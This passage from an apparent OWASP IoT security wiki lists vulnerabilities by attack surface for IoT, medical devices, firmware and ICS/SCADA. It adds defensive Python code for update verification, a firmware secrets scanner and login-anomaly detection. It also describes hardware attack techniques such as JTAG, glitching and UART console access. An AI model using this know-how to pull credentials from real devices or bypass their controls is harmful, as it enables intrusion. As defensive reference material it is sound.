* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to weak values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 to 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies access to that service or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a great deal of useful information: source code and binaries of the running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side-channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to the device<br />
* The usual security measure is a custom bootloader that prevents entering single-user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
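The following is an added example for the '''Update Mechanism''' rows above ('''Update Location Writable''' and updates sent or stored without protection); it is not code from the OWASP project or from any vendor. It shows the two checks a device should run before applying a staged update: refuse a staging directory that is world-writable, and refuse an image whose authenticator does not verify. An HMAC-SHA256 over the image with a key provisioned to the device stands in for the vendor's signature scheme; that is an assumption for illustration, since production devices verify an asymmetric signature against a vendor public key that cannot be recovered from the device itself. The sample image, key and directory layout are constructed for the example.<br />

```python
"""Pre-apply checks for a staged firmware update (added example, not project code)."""
import hashlib
import hmac
import os
import stat
import tempfile


class UpdateRejected(Exception):
    """Raised for any condition under which the update must not be applied."""


def check_staging_dir(path):
    """Refuse a staging directory that other local users could write into."""
    st = os.stat(path)
    if not stat.S_ISDIR(st.st_mode):
        raise UpdateRejected("staging path is not a directory")
    if st.st_mode & stat.S_IWOTH:
        raise UpdateRejected("staging directory is world-writable")
    return True


def verify_image(image_path, tag_hex, key):
    """Check the image's authenticator in constant time; return its SHA-256 on success.

    HMAC with a device-provisioned key is an assumption standing in for the
    vendor's asymmetric signature scheme.
    """
    with open(image_path, "rb") as fh:
        data = fh.read()
    expected = hmac.new(key, data, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag_hex):
        raise UpdateRejected("authenticator mismatch")
    return hashlib.sha256(data).hexdigest()


def apply_update(staging_dir, image_name, tag_hex, key):
    """Run both checks; return 'accepted' or 'rejected: <reason>'.

    A real device would write the image to flash only on 'accepted'.
    """
    try:
        check_staging_dir(staging_dir)
        verify_image(os.path.join(staging_dir, image_name), tag_hex, key)
    except UpdateRejected as exc:
        return f"rejected: {exc}"
    return "accepted"


# Constructed sample values; no real firmware image or key is embedded here
SAMPLE_KEY = b"constructed-device-provisioned-key"
SAMPLE_IMAGE = b"\x7fFIRMWARE-IMAGE-CONSTRUCTED-" + bytes(range(64))


def demo():
    """Exercise the checks on a valid image, a world-writable staging dir and a tampered image."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        staging = os.path.join(tmp, "staging")
        os.mkdir(staging, 0o755)
        image = os.path.join(staging, "update.bin")
        with open(image, "wb") as fh:
            fh.write(SAMPLE_IMAGE)
        # the authenticator is produced vendor-side and shipped with the image
        tag = hmac.new(SAMPLE_KEY, SAMPLE_IMAGE, hashlib.sha256).hexdigest()

        results["valid"] = apply_update(staging, "update.bin", tag, SAMPLE_KEY)

        os.chmod(staging, 0o777)  # the "Update Location Writable" condition
        results["world_writable"] = apply_update(staging, "update.bin", tag, SAMPLE_KEY)
        os.chmod(staging, 0o755)

        with open(image, "r+b") as fh:  # alter one byte: the authenticator no longer verifies
            fh.seek(8)
            fh.write(b"X")
        results["tampered"] = apply_update(staging, "update.bin", tag, SAMPLE_KEY)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case}: {outcome}")
```

The world-writable check is deliberately separate from the authenticator check: even a correctly signed image should not be read from a location another local user can replace, because the window between verification and flashing is a classic time-of-check/time-of-use gap.<br />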
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
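As an added example of the '''File system analysis''' step above, the script below scans an extracted firmware root filesystem for the kinds of sensitive data the vulnerability list names (encryption keys, hardcoded credentials, backdoor accounts, a certificate shared across devices). It is written for this page and is not Firmwalker, Binwalk or any other tool linked in the table. To run offline it constructs a small root filesystem in a temporary directory; the file names, regular expressions and sample contents are assumptions for illustration, and the PEM bodies are placeholders rather than real key or certificate material.<br />

```python
"""Scan an extracted firmware root filesystem for sensitive data (added example, not project code)."""
import hashlib
import os
import re
import tempfile

PRIVATE_KEY_RE = re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
CERT_RE = re.compile(r"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)
# Assumed shape of a hardcoded credential in a config or shell file: key=value or key: value
CRED_RE = re.compile(r"^\s*(?:\w*pass(?:word|wd)?|secret|token)\s*[=:]\s*\S+", re.I | re.M)
TEXT_EXTENSIONS = {".conf", ".cfg", ".ini", ".sh", ".txt", ".json", ".xml"}


def scan_rootfs(root):
    """Walk an extracted root filesystem and collect the findings a firmware review looks for."""
    findings = {"private_keys": [], "credentials": [], "shadow_accounts": [], "certificates": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    text = fh.read().decode("utf-8", errors="ignore")
            except OSError:
                continue  # unreadable special file: skip it rather than abort the scan
            if PRIVATE_KEY_RE.search(text):
                findings["private_keys"].append(rel)
            for cert in CERT_RE.findall(text):
                # fingerprint of the PEM body; the same value in two images means a shared certificate
                findings["certificates"][rel] = hashlib.sha256(cert.encode()).hexdigest()
            if rel == "etc/shadow":
                for line in text.splitlines():
                    fields = line.split(":")
                    # an empty, '*' or '!'-prefixed hash field is a locked account; anything else is usable
                    if len(fields) > 1 and fields[1] not in ("", "*") and not fields[1].startswith("!"):
                        findings["shadow_accounts"].append(fields[0])
            elif os.path.splitext(name)[1] in TEXT_EXTENSIONS:
                for m in CRED_RE.finditer(text):
                    findings["credentials"].append((rel, m.group(0).strip()))
    for key in ("private_keys", "shadow_accounts", "credentials"):
        findings[key].sort()
    return findings


def shared_certificates(scans):
    """Map certificate fingerprint -> image names, for fingerprints seen in more than one image."""
    by_fp = {}
    for image, f in scans.items():
        for fp in set(f["certificates"].values()):
            by_fp.setdefault(fp, []).append(image)
    return {fp: sorted(imgs) for fp, imgs in by_fp.items() if len(imgs) > 1}


# Constructed PEM blobs: the base64 bodies are placeholders, not real key or certificate material
FAKE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQtTk9ULUEtUkVBTC1LRVk=\n-----END RSA PRIVATE KEY-----\n"
FAKE_CERT = "-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQtTk9ULUEtUkVBTC1DRVJU\n-----END CERTIFICATE-----\n"


def build_sample_rootfs(base):
    """Write a small constructed root filesystem under `base` containing the kinds of findings above."""
    files = {
        "etc/shadow": "root:$1$abcd$CONSTRUCTEDHASH:17000:0:99999:7:::\nnobody:*:17000:0:99999:7:::\n",
        "etc/config/wireless.conf": "ssid=demo\npassword=hunter2\n",
        "etc/ssl/server.key": FAKE_KEY,
        "etc/ssl/server.crt": FAKE_CERT,
        "usr/bin/helper.sh": "#!/bin/sh\nADMIN_PASSWD=secret123\n",
    }
    for rel, content in files.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def demo():
    """Scan two constructed images that ship the same certificate; return (findings of A, shared certs)."""
    with tempfile.TemporaryDirectory() as tmp:
        scans = {}
        for image in ("imageA", "imageB"):
            root = os.path.join(tmp, image)
            build_sample_rootfs(root)
            scans[image] = scan_rootfs(root)
        return scans["imageA"], shared_certificates(scans)


if __name__ == "__main__":
    findings, shared = demo()
    for key, value in findings.items():
        print(f"{key}: {value}")
    print("certificates shared across images:", shared)
```

Point `scan_rootfs` at a directory produced by an extraction tool such as Binwalk to use it on a real image; the credential pattern is intentionally broad, so treat its output as a list of lines to review rather than confirmed findings.<br />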
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT device logging events. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
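As an added example, not part of the project's draft, the script below implements detection logic for a handful of the events in the table above (unsupported HTTP method, oversized parameter, multiple failed passwords, high rate of login attempts, and a session whose source changes) and runs it over a constructed batch of device log records. The record field names, thresholds and window size are assumptions for illustration; a real device or collector would map its own log format onto them.<br />

```python
"""Detection rules for a subset of the recommended IoT logging events (added example)."""
from collections import defaultdict

# Assumed thresholds; tune per deployment
FAILED_PASSWORD_THRESHOLD = 5    # failures from one source -> "Multiple Failed Passwords"
LOGIN_RATE_THRESHOLD = 10        # attempts from one source within LOGIN_RATE_WINDOW seconds
LOGIN_RATE_WINDOW = 60
MAX_PARAM_LENGTH = 256           # longest value any request parameter legitimately carries
SUPPORTED_METHODS = {"GET", "POST", "PUT", "DELETE"}


def detect_events(records):
    """Return [(event_name, source)] for the records, in the order the conditions are met."""
    events = []
    failures = defaultdict(int)      # source -> failed password count
    attempts = defaultdict(list)     # source -> timestamps of recent login attempts
    session_origin = {}              # session id -> source that first used it
    for r in records:
        src, kind = r["src"], r["type"]
        if kind == "http":
            if r["method"] not in SUPPORTED_METHODS:
                events.append(("Attempt to Invoke Unsupported HTTP Method", src))
            if any(len(v) > MAX_PARAM_LENGTH for v in r["params"].values()):
                events.append(("Unexpected Quantity of Characters in Parameter", src))
        elif kind == "login":
            # sliding window over this source's recent attempts
            recent = [t for t in attempts[src] if r["ts"] - t <= LOGIN_RATE_WINDOW]
            recent.append(r["ts"])
            attempts[src] = recent
            if len(recent) == LOGIN_RATE_THRESHOLD:      # emit once, when the threshold is crossed
                events.append(("High Rate of Login Attempts", src))
            if r["result"] == "fail":
                failures[src] += 1
                if failures[src] == FAILED_PASSWORD_THRESHOLD:
                    events.append(("Multiple Failed Passwords", src))
        elif kind == "session":
            origin = session_origin.setdefault(r["session_id"], src)
            if origin != src:
                events.append(("Source Location Changes During Session", src))
    return events


# Constructed sample batch: one scanner-like host, one password-guessing host,
# one bursty host, and a session that moves to a different network
SAMPLE_RECORDS = [
    {"ts": 0, "type": "http", "src": "10.0.0.5", "method": "TRACE", "params": {}},
    {"ts": 1, "type": "http", "src": "10.0.0.5", "method": "GET", "params": {"id": "A" * 600}},
    *[{"ts": 2 + i, "type": "login", "src": "10.0.0.7", "user": "admin", "result": "fail"}
      for i in range(6)],
    *[{"ts": 20 + i, "type": "login", "src": "10.0.0.9", "user": "operator", "result": "ok"}
      for i in range(12)],
    {"ts": 40, "type": "session", "src": "10.0.0.9", "session_id": "s1"},
    {"ts": 41, "type": "session", "src": "203.0.113.4", "session_id": "s1"},
]

if __name__ == "__main__":
    for name, src in detect_events(SAMPLE_RECORDS):
        print(f"{name} (source {src})")
```

Each rule emits its event once when the threshold is crossed rather than on every subsequent record, which keeps a brute-force burst from flooding the collector with thousands of identical events; the event itself carries the source so the responder can pivot on it.<br />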
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
